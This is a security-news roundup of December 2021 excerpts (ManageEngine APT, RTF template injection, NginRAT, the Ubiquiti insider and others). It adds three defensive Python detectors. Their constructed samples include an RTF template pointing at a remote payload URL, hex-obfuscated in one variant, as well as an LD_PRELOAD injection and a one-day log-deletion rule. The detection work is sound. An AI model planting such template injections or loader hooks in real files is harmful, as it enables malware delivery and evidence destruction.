December 2, 2021

Fortify Security Team

Title: APT Expands Attack on ManageEngine With Active Campaign Against ServiceDesk Plus
Date Published: December 2, 2021

https://unit42.paloaltonetworks.com/tiltedtemple-manageengine-servicedesk-plus/

Excerpt: “Over the course of three months, a persistent and determined APT actor has launched multiple campaigns which have now resulted in compromises to at least 4 additional organizations, for a total of 13. Beginning on Sept. 16, 2021, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) released an alert warning that advanced persistent threat (APT) actors were actively exploiting newly identified vulnerabilities in a self-service password management and single sign-on solution known as ManageEngine ADSelfService Plus. Building upon the findings of that initial report, on Nov. 7, Unit 42 disclosed a second, more sophisticated, active and difficult-to-detect campaign that had resulted in the compromise of at least nine organizations.”

Title: Hackers Are Turning to This Simple Technique to Install Their Malware on PCs
Date Published: December 2, 2021

https://www.zdnet.com/article/hackers-are-turning-to-this-simple-technique-to-install-their-malware-on-pcs/

Excerpt: “The technique is RTF template injection. By altering an RTF file’s document-formatting properties, it’s possible for attackers to weaponize an RTF file to retrieve remote content from a URL controlled by the attackers, enabling them to secretly retrieve a malware payload that gets installed on the victim’s machine. Attackers can use RTF template injections to open documents in Microsoft Word, which will use the malicious URL to retrieve the payload while also using Word to display the decoy document.”
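
The scanner below is an added example, not code from the ZDNet article or from the researchers it reports on. It does the check a mail gateway or sandbox would want for the injection the excerpt describes: it locates the `\template` destination in an RTF file, undoes the `\'hh` and `\uN` escapes attackers use to hide the URL from naive string matching, and reports whether the template points at a remote location (URL or UNC path). The sample RTF files and the 203.0.113.10 address are constructed for the demo and are not real malware samples.

```python
import re

# Constructed sample RTF files for the demo (not real malware samples). The
# injected ones carry a {\*\template ...} destination pointing at a remote URL;
# the hex variant hides the URL behind RTF \'hh byte escapes. 203.0.113.10 is a
# documentation address, not a real host.
BENIGN_RTF = rb"{\rtf1\ansi\deff0 {\fonttbl{\f0 Calibri;}}\f0 Quarterly report\par}"
LOCAL_TEMPLATE_RTF = (rb"{\rtf1\ansi\deff0 {\*\template C:\\Templates\\Normal.dotm}"
                      rb"{\fonttbl{\f0 Calibri;}}\f0 Quarterly report\par}")
INJECTED_RTF = (rb"{\rtf1\ansi\deff0 {\*\template http://203.0.113.10/update.dotm}"
                rb"{\fonttbl{\f0 Calibri;}}\f0 Quarterly report\par}")
INJECTED_HEX_RTF = (rb"{\rtf1\ansi\deff0 {\*\template \'68\'74\'74\'70://203.0.113.10/t.dotm}"
                    rb"{\fonttbl{\f0 Calibri;}}\f0 Quarterly report\par}")

TEMPLATE_WORD = re.compile(rb"\\template(?![a-zA-Z])")        # the \template control word
HEX_ESCAPE = re.compile(rb"\\'([0-9a-fA-F]{2})")                # \'hh  one encoded byte
UNICODE_ESCAPE = re.compile(rb"\\u(-?\d+) ?(?:\\'[0-9a-fA-F]{2}|.)")  # \uN plus its fallback char
CONTROL_WORD = re.compile(rb"\\[a-zA-Z]+-?\d*\s?")             # any other \keyword
REMOTE = re.compile(r"^(?:https?|ftp|file)://|^\\\\[^\\]+\\", re.IGNORECASE)  # URL or UNC path


def _decode_group(data: bytes, i: int) -> tuple[str, bool]:
    """Decode the text of the RTF group whose content starts at offset i, up to the
    brace that closes it. Returns (text, obfuscated); obfuscated is True when hex or
    unicode escapes had to be resolved to recover the text."""
    depth, out, obfuscated = 1, [], False
    while i < len(data):
        c = data[i:i + 1]
        if c == b"{":
            depth += 1
            i += 1
        elif c == b"}":
            depth -= 1
            i += 1
            if depth == 0:
                break
        elif c == b"\\":
            nxt = data[i + 1:i + 2]
            if nxt == b"'" and (m := HEX_ESCAPE.match(data, i)):
                out.append(chr(int(m.group(1), 16)))
                i, obfuscated = m.end(), True
            elif nxt in (b"\\", b"{", b"}"):            # escaped literal character
                out.append(nxt.decode("ascii"))
                i += 2
            elif nxt == b"u" and (m := UNICODE_ESCAPE.match(data, i)):
                code = int(m.group(1))                  # negative values wrap at 65536
                out.append(chr(code + 65536 if code < 0 else code))
                i, obfuscated = m.end(), True
            elif m := CONTROL_WORD.match(data, i):      # formatting keyword: carries no text
                i = m.end()
            else:                                       # control symbol such as \* or \~
                i += 2
        else:
            out.append(c.decode("latin-1"))
            i += 1
    return "".join(out).strip(), obfuscated


def scan_rtf(data: bytes) -> list[dict]:
    """One finding per \template destination in an RTF file. A remote target is what
    Word will fetch and load as the document template while showing the decoy."""
    if not data.lstrip().startswith(b"{\\rt"):         # Word accepts headers as short as {\rt
        return []
    findings = []
    for m in TEMPLATE_WORD.finditer(data):
        target, obfuscated = _decode_group(data, m.end())
        findings.append({"target": target,
                         "remote": bool(REMOTE.match(target)),
                         "obfuscated": obfuscated})
    return findings


def scan_file(path: str) -> list[dict]:
    with open(path, "rb") as fh:
        return scan_rtf(fh.read())


if __name__ == "__main__":
    for name, blob in [("benign", BENIGN_RTF), ("local template", LOCAL_TEMPLATE_RTF),
                       ("injected", INJECTED_RTF), ("injected, hex-obfuscated", INJECTED_HEX_RTF)]:
        print(f"{name}: {scan_rtf(blob)}")
```

Run `scan_file()` over attachments at the gateway or on a sandbox host. A finding with `remote: True` is hostile regardless of how harmless the visible document is, since the decoy content is what the user sees while Word retrieves the template; a local `.dotm` path is normal for files produced from a corporate template.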

Title: Planned Parenthood LA Discloses Data Breach after Ransomware Attack
Date Published: December 1, 2021

https://www.bleepingcomputer.com/news/security/planned-parenthood-la-discloses-data-breach-after-ransomware-attack/

Excerpt: “However, it wasn’t until November 4th that PPLA determined that the stolen files contained patients’ personal information, including their “address, insurance information, date of birth, and clinical information, such as diagnosis, procedure, and/or prescription information.” In a statement to the Washington Post, who first reported on the breach, PPLA spokesperson John Erickson said the stolen files contained the personal data of approximately 400,000 patients and the breach was caused by a ransomware attack.”

Title: Emotet Now Spreads via Fake Adobe Windows App Installer Packages
Date Published: December 1, 2021

https://www.bleepingcomputer.com/news/security/emotet-now-spreads-via-fake-adobe-windows-app-installer-packages/

Excerpt: “The Emotet malware is now distributed through malicious Windows App Installer packages that pretend to be Adobe PDF software. Emotet is a notorious malware infection that spreads through phishing emails and malicious attachments. Once installed, it will steal victims’ emails for other spam campaigns and deploy malware, such as TrickBot and Qbot, which commonly lead to ransomware attacks.”

Title: Researchers Detail 17 Malicious Frameworks Used to Attack Air-Gapped Networks
Date Published: December 2, 2021

https://thehackernews.com/2021/12/researches-detail-17-malicious.html

Excerpt: “Four different malicious frameworks designed to attack air-gapped networks were detected in the first half of 2020 alone, bringing the total number of such toolkits to 17 and offering adversaries a pathway to cyber espionage and the exfiltration of classified information. “All frameworks are designed to perform some form of espionage, [and] all the frameworks used USB drives as the physical transmission medium to transfer data in and out of the targeted air-gapped networks,” ESET researchers Alexis Dorais-Joncas and Facundo Muñoz said in a comprehensive study of the frameworks.”

Title: New Malware Hides as Legit NGINX Process on E-commerce Servers
Date Published: December 2, 2021

https://www.bleepingcomputer.com/news/security/new-malware-hides-as-legit-nginx-process-on-e-commerce-servers/

Excerpt: “eCommerce servers are being targeted with remote access malware that hides on Nginx servers in a way that makes it virtually invisible to security solutions. The threat received the name NginRAT, a combination of the application it targets and the remote access capabilities it provides and is being used in server-side attacks to steal payment card data from online stores. NginRAT has infected servers in the U.S., Germany, and France where it injects into Nginx processes that are indistinguishable from legitimate ones, allowing it to remain undetected.”
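
The triage script below is an added example; it is not the Sansec research the article reports on and does not use NginRAT's own indicators. Since the implant lives inside processes that present themselves as nginx, it applies generic injected-code heuristics to every such process on a Linux host: executable mappings from unexpected or deleted files, anonymous writable-and-executable memory, and loader environment variables such as LD_PRELOAD. The sample `maps` and `environ` content and the EXPECTED_CODE_PATHS baseline are constructed and assumed, not captured from an infected server, and a careful implant can defeat all three checks, so treat hits as leads rather than verdicts.

```python
import re
from pathlib import Path

# Paths a stock nginx process is expected to map executable code from. Assumed
# baseline for a typical distro package; adjust it to your own build.
EXPECTED_CODE_PATHS = ("/usr/sbin/nginx", "/usr/local/nginx/", "/lib/", "/lib64/",
                       "/usr/lib/", "/usr/lib64/")
LOADER_VARS = ("LD_PRELOAD", "LD_LIBRARY_PATH", "LD_AUDIT")   # env vars that inject code at load

# Constructed /proc/<pid>/maps and /proc/<pid>/environ content for the demo: a
# worker with a library mapped from /tmp and then unlinked, a loader hooked in via
# LD_PRELOAD from /dev/shm, and an anonymous rwx region. Not captured from NginRAT.
SAMPLE_MAPS = """\
55d1c3a00000-55d1c3b2a000 r-xp 00000000 fd:01 1310770    /usr/sbin/nginx
7f1e2c000000-7f1e2c1c0000 r-xp 00000000 fd:01 2228256    /usr/lib/x86_64-linux-gnu/libc.so.6
7f1e2c400000-7f1e2c41a000 r-xp 00000000 fd:01 4194424    /tmp/.x/libwrap.so (deleted)
7f1e2c600000-7f1e2c60b000 r-xp 00000000 fd:01 3932291    /dev/shm/.cache/ld.so
7f1e2c800000-7f1e2c801000 r--p 00000000 fd:01 2228256    /usr/lib/x86_64-linux-gnu/libc.so.6
7f1e2ca00000-7f1e2ca21000 rwxp 00000000 00:00 0
7ffd3e9d0000-7ffd3e9f1000 rw-p 00000000 00:00 0          [stack]
7ffd3e9fe000-7ffd3ea00000 r-xp 00000000 00:00 0          [vdso]
"""
SAMPLE_ENVIRON = b"PATH=/usr/sbin:/usr/bin\0LD_PRELOAD=/dev/shm/.cache/ld.so\0HOME=/root\0"

# /proc/<pid>/maps line: address perms offset dev inode [pathname]
MAPS_LINE = re.compile(r"^\S+\s+(\S+)\s+\S+\s+\S+\s+\d+\s*(.*)$")


def suspicious_mappings(maps_text: str) -> list[str]:
    """Executable mappings a stock nginx should not have: code from outside the
    expected paths, files deleted after being mapped, or writable+executable
    anonymous memory. (OpenResty/LuaJIT builds JIT legitimately; drop the rwx
    check for those.)"""
    hits = set()
    for line in maps_text.splitlines():
        m = MAPS_LINE.match(line)
        if not m or "x" not in m.group(1):
            continue
        perms, path = m.group(1), m.group(2).strip()
        if not path:
            if "w" in perms:
                hits.add("<anonymous rwx mapping>")
        elif path.startswith("["):
            continue                                    # [vdso], [vsyscall]: kernel-provided
        elif path.endswith("(deleted)") or not path.startswith(EXPECTED_CODE_PATHS):
            hits.add(path)
    return sorted(hits)


def loader_injection_vars(environ_blob: bytes) -> dict[str, str]:
    """/proc/<pid>/environ is NUL-separated KEY=VALUE; return any dynamic-loader
    variables present, since LD_PRELOAD is the simplest way to ride inside nginx."""
    env = dict(item.split("=", 1)
               for item in environ_blob.decode(errors="replace").split("\0") if "=" in item)
    return {k: v for k, v in env.items() if k in LOADER_VARS}


def audit_live(process_name: str = "nginx", proc: Path = Path("/proc")) -> dict[int, dict]:
    """Linux only: run both checks on every process named process_name. Run as root,
    since maps and environ of other users' processes are not readable otherwise."""
    report = {}
    for pid_dir in proc.glob("[0-9]*"):
        try:
            if (pid_dir / "comm").read_text().strip() != process_name:
                continue
            findings = {"maps": suspicious_mappings((pid_dir / "maps").read_text()),
                        "env": loader_injection_vars((pid_dir / "environ").read_bytes())}
        except OSError:
            continue                                    # process exited or not readable
        if findings["maps"] or findings["env"]:
            report[int(pid_dir.name)] = findings
    return report


if __name__ == "__main__":
    print("sample maps:", suspicious_mappings(SAMPLE_MAPS))
    print("sample environ:", loader_injection_vars(SAMPLE_ENVIRON))
    print("live audit:", audit_live())
```

On a suspect e-commerce host, run `audit_live()` as root and compare the mapped files against the package manager's file list for nginx before acting on anything; a clean result does not clear the server, because code injected through a hooked loader function rather than LD_PRELOAD leaves only the mapping and anonymous-memory traces, and those can be scrubbed too.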

Title: Tracking a p2p Network Related to TA505
Date Published: December 2, 2021

https://blog.fox-it.com/2021/12/02/tracking-a-p2p-network-related-to-ta505/

Excerpt: “For the past few months NCC Group has been closely tracking the operations of TA505 and the development of their various projects (e.g. Clop). During this research we encountered a number of binary files that we have attributed to the developer(s) of ‘Grace’ (i.e. FlawedGrace). These included a remote administration tool (RAT) used exclusively by TA505. The identified binary files are capable of communicating with each other through a peer-to-peer (P2P) network via UDP. While there does not appear to be a direct interaction between the identified samples and a host infected by ‘Grace’, we believe with medium to high confidence that there is a connection to the developer(s) of ‘Grace’ and the identified binaries.”

Title: Double Extortion Ransomware Victims Soar 935%
Date Published: December 2, 2021

https://www.infosecurity-magazine.com/news/double-extortion-ransomware-soar/

Excerpt: “During that time, an “unholy alliance” of initial access brokers and ransomware-as-a-service (RaaS) affiliate programs has led to a surge in breaches, it claimed. In total, the number of breach victims on ransomware data leak sites surged from 229 in the previous reporting period to 2371, Group-IB noted. During the same period, the number of leak sites more than doubled to 28, and the number of RaaS affiliates increased 19%, with 21 new groups discovered.”

Title: Former Ubiquiti Dev Charged for Trying to Extort His Employer
Date Published: December 1, 2021

https://www.bleepingcomputer.com/news/security/former-ubiquiti-dev-charged-for-trying-to-extort-his-employer/

Excerpt: “Throughout this process, the defendant tried hiding his home IP address using Surfshark’s VPN services. However, his actual location was exposed after a temporary Internet outage. To hide his malicious activity, Sharp also altered log retention policies and other files that would have exposed his identity during the subsequent incident investigation. “Among other things, SHARP applied one-day lifecycle retention policies to certain logs on AWS which would have the effect of deleting certain evidence of the intruder’s activity within one day,” the court documents read.”
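
Below is an added example, not code from the BleepingComputer article or the court filing: two checks that would have surfaced the log tampering the excerpt describes. The first audits an S3 lifecycle configuration (the dict shape that boto3's `get_bucket_lifecycle_configuration` returns) for enabled rules that delete current or noncurrent objects sooner than policy allows; the second scans CloudTrail records for lifecycle changes on buckets that hold audit evidence. The bucket names, the 365-day floor, and every sample rule and record are constructed for the demo.

```python
from typing import Iterable

# Organisational floor for log retention. Assumed policy value, not an AWS default.
MIN_LOG_RETENTION_DAYS = 365
# Buckets holding audit evidence (CloudTrail, VPC flow logs, ...). Assumed names.
LOG_BUCKETS = {"corp-audit-logs", "corp-vpc-flowlogs"}
# CloudTrail event names that change or remove a bucket's lifecycle rules.
LIFECYCLE_EVENTS = {"PutBucketLifecycle", "PutBucketLifecycleConfiguration", "DeleteBucketLifecycle"}

# Constructed lifecycle configuration in the shape of
# s3.get_bucket_lifecycle_configuration(Bucket=...). The 1-day rule is the kind of
# change the indictment describes; the 7-day noncurrent rule lets deletions become
# permanent within a week even with versioning on.
SAMPLE_LIFECYCLE = {
    "Rules": [
        {"ID": "archive-then-keep", "Status": "Enabled", "Filter": {"Prefix": "cloudtrail/"},
         "Transitions": [{"Days": 90, "StorageClass": "GLACIER"}], "Expiration": {"Days": 400}},
        {"ID": "expire-cloudtrail-fast", "Status": "Enabled", "Filter": {"Prefix": "cloudtrail/"},
         "Expiration": {"Days": 1}},
        {"ID": "old-disabled-rule", "Status": "Disabled", "Filter": {"Prefix": ""},
         "Expiration": {"Days": 1}},
        {"ID": "prune-old-versions", "Status": "Enabled", "Filter": {"Prefix": "flowlogs/"},
         "NoncurrentVersionExpiration": {"NoncurrentDays": 7}},
    ]
}

# Constructed CloudTrail records (field names as CloudTrail emits them, values invented).
SAMPLE_CLOUDTRAIL = [
    {"eventTime": "2021-01-10T03:12:44Z", "eventSource": "s3.amazonaws.com",
     "eventName": "PutBucketLifecycle", "sourceIPAddress": "198.51.100.7",
     "userIdentity": {"arn": "arn:aws:iam::123456789012:user/build-svc"},
     "requestParameters": {"bucketName": "corp-audit-logs"}},
    {"eventTime": "2021-01-10T03:13:01Z", "eventSource": "s3.amazonaws.com",
     "eventName": "PutObject", "sourceIPAddress": "198.51.100.7",
     "userIdentity": {"arn": "arn:aws:iam::123456789012:user/build-svc"},
     "requestParameters": {"bucketName": "corp-audit-logs", "key": "x"}},
    {"eventTime": "2021-01-10T09:00:00Z", "eventSource": "s3.amazonaws.com",
     "eventName": "PutBucketLifecycle", "sourceIPAddress": "10.0.4.21",
     "userIdentity": {"arn": "arn:aws:iam::123456789012:role/storage-admin"},
     "requestParameters": {"bucketName": "scratch-builds"}},
]


def short_retention_rules(lifecycle: dict, min_days: int = MIN_LOG_RETENTION_DAYS) -> list[dict]:
    """Enabled rules that delete current or noncurrent objects sooner than min_days."""
    flagged = []
    for rule in lifecycle.get("Rules", []):
        if rule.get("Status") != "Enabled":
            continue
        horizons = [rule.get("Expiration", {}).get("Days"),
                    rule.get("NoncurrentVersionExpiration", {}).get("NoncurrentDays")]
        horizons = [d for d in horizons if d is not None]
        if horizons and min(horizons) < min_days:
            prefix = rule.get("Filter", {}).get("Prefix", rule.get("Prefix", ""))  # legacy rules use top-level Prefix
            flagged.append({"id": rule.get("ID"), "prefix": prefix, "days": min(horizons)})
    return flagged


def lifecycle_changes_on_log_buckets(records: Iterable[dict],
                                     log_buckets: set[str] = LOG_BUCKETS) -> list[dict]:
    """CloudTrail management events that touched lifecycle rules on a log bucket.
    Feed it the Records[] array of a CloudTrail log file or an EventBridge stream."""
    hits = []
    for rec in records:
        if rec.get("eventSource") != "s3.amazonaws.com" or rec.get("eventName") not in LIFECYCLE_EVENTS:
            continue
        bucket = rec.get("requestParameters", {}).get("bucketName")
        if bucket in log_buckets:
            hits.append({"time": rec.get("eventTime"), "event": rec["eventName"], "bucket": bucket,
                         "principal": rec.get("userIdentity", {}).get("arn"),
                         "source_ip": rec.get("sourceIPAddress")})
    return hits


if __name__ == "__main__":
    print("short-retention rules:", short_retention_rules(SAMPLE_LIFECYCLE))
    print("lifecycle changes on log buckets:", lifecycle_changes_on_log_buckets(SAMPLE_CLOUDTRAIL))
```

The detection is only a safety net: the durable control is to keep audit logs in a bucket that the engineering accounts cannot administer, so that the principal who writes code cannot also shorten the evidence's lifetime.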

Title: Russian Man Sentenced to 60 Months in Prison for Running ‘Bulletproof’ Hosting for Cybercrime
Date Published: December 1, 2021

https://www.darkreading.com/attacks-breaches/russian-man-sentenced-to-60-months-in-prison-for-running-bulletproof-hosting-service

Excerpt: “Aleksandr Grichishkin, 34, offered technology infrastructure services, including IP addresses, servers, and domains, for cybercriminals to create botnets, infect targeted organizations with malware, and steal banking credentials. His organization supported cybercriminals who targeted US organizations in cyberattack campaigns between 2009 and 2015. Among the rogue’s gallery of malware hosted on the systems: Zeus, SpyEye, Citadel, and the Blackhole Exploit Kit. Two of Grichishkin’s co-conspirators already had been sentenced to prison: Pavel Stassi, 30, of Estonia (24 months), and Aleksandr Skorodumov, 33, of Lithuania (48 months).”
